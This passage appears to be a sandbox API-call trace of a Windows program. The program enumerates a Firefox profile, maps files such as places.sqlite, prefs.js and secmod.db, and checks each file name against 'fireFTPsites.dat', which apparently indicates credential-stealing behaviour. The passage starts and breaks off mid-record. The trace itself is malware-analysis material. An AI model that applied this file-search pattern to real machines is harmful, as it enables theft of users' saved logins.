4 [0590.314] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0590.314] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.314] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps\\*.*", lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 0x57ca60 [0590.314] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.314] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 1 [0590.314] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.314] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.314] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 0 [0590.314] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.315] LocalFree (hMem=0x56cab0) returned 0x0 [0590.315] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.315] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.315] lstrlenW (lpString="\\") returned 1 [0590.315] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.315] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.315] lstrlenW (lpString="parent.lock") returned 11 [0590.315] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.315] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bbf0 [0590.315] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.315] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.315] CloseHandle (hObject=0x4c8) returned 1 [0590.315] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0590.315] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.315] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x63bd28, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock") returned 0x58 [0590.315] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.315] CloseHandle (hObject=0x4c8) returned 1 [0590.315] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.315] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0590.315] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0590.315] CloseHandle (hObject=0x4c8) returned 1 [0590.315] LocalFree (hMem=0x63bd28) returned 0x0 [0590.315] StrStrIW (lpFirst="parent.lock", lpSrch="fireFTPsites.dat") returned 0x0 [0590.315] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.315] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.315] lstrlenW (lpString="\\") returned 1 [0590.315] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.315] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.315] lstrlenW (lpString="permissions.sqlite") returned 18 [0590.315] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.315] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56cab0 [0590.315] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.315] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.315] CloseHandle (hObject=0x4c8) returned 1 [0590.316] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0590.316] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x2ed9860 [0590.316] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x2ed9860, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite") returned 0x5f [0590.316] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.316] CloseHandle (hObject=0x4c8) returned 1 [0590.316] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.316] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0590.316] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.316] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.316] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57be70 [0590.316] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.317] CloseHandle (hObject=0x660) returned 1 [0590.317] CloseHandle (hObject=0x4c8) returned 1 [0590.317] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.317] StrStrIW (lpFirst="permissions.sqlite", lpSrch="fireFTPsites.dat") returned 0x0 [0590.317] LocalFree (hMem=0x56cab0) returned 0x0 [0590.317] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.317] lstrlenW (lpString="\\") returned 1 [0590.317] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.317] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.317] lstrlenW (lpString="places.sqlite") returned 13 [0590.317] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.317] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.317] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.317] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.317] CloseHandle (hObject=0x4c8) returned 1 [0590.317] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0590.317] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x2ed9860 [0590.317] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x2ed9860, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite") returned 0x5a [0590.317] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.317] CloseHandle (hObject=0x4c8) returned 1 [0590.317] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.318] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa00000 [0590.318] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.318] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.414] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.414] StrStrIW (lpFirst="places.sqlite", lpSrch="fireFTPsites.dat") returned 0x0 [0590.415] LocalFree (hMem=0x56cab0) returned 0x0 [0590.415] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.415] lstrlenW (lpString="\\") returned 1 [0590.415] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.415] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.415] lstrlenW (lpString="pluginreg.dat") returned 13 [0590.415] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.415] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.415] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.415] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.415] CloseHandle (hObject=0x4c8) returned 1 [0590.415] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0590.415] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x2ed9860 [0590.415] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x2ed9860, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat") returned 0x5a [0590.415] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.415] CloseHandle (hObject=0x4c8) returned 1 [0590.415] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.415] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc91 [0590.415] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.415] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.416] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.416] StrStrIW (lpFirst="pluginreg.dat", lpSrch="fireFTPsites.dat") returned 0x0 [0590.416] LocalFree (hMem=0x56cab0) returned 0x0 [0590.416] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.416] lstrlenW (lpString="\\") returned 1 [0590.416] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.416] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.416] lstrlenW (lpString="prefs.js") returned 8 [0590.416] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.416] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bbf0 [0590.416] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.416] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.416] CloseHandle (hObject=0x4c8) returned 1 [0590.416] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0590.416] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bd28 [0590.416] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x63bd28, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js") returned 0x55 [0590.416] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.416] CloseHandle (hObject=0x4c8) returned 1 [0590.416] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.416] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1540 [0590.416] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.416] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.417] LocalFree (hMem=0x63bd28) returned 0x0 [0590.417] StrStrIW (lpFirst="prefs.js", lpSrch="fireFTPsites.dat") returned 0x0 [0590.417] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.417] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.417] lstrlenW (lpString="\\") returned 1 [0590.417] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.417] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.417] lstrlenW (lpString="search.json") returned 11 [0590.417] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.417] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bbf0 [0590.417] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.417] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.417] CloseHandle (hObject=0x4c8) returned 1 [0590.417] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0590.417] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.417] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x63bd28, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json") returned 0x58 [0590.417] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.417] CloseHandle (hObject=0x4c8) returned 1 [0590.417] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.417] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4183 [0590.417] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.417] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.418] LocalFree (hMem=0x63bd28) returned 0x0 [0590.418] StrStrIW (lpFirst="search.json", lpSrch="fireFTPsites.dat") returned 0x0 [0590.418] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.418] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.418] lstrlenW (lpString="\\") returned 1 [0590.418] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.418] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.418] lstrlenW (lpString="secmod.db") returned 9 [0590.418] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.418] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bbf0 [0590.418] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.418] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.418] CloseHandle (hObject=0x4c8) returned 1 [0590.418] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x56 [0590.418] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bd28 [0590.418] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x63bd28, nSize=0x56 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db") returned 0x56 [0590.418] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.418] CloseHandle (hObject=0x4c8) returned 1 [0590.418] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.418] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0590.418] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.418] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.419] LocalFree (hMem=0x63bd28) returned 0x0 [0590.419] StrStrIW (lpFirst="secmod.db", lpSrch="fireFTPsites.dat") returned 0x0 [0590.419] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.419] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.419] lstrlenW (lpString="\\") returned 1 [0590.419] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.419] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.419] lstrlenW (lpString="sessionstore.bak") returned 16 [0590.419] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.419] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56cab0 [0590.419] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.419] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.419] CloseHandle (hObject=0x4c8) returned 1 [0590.419] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0590.419] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x2ed9860 [0590.419] ExpandEnvironmentStringsW (in: 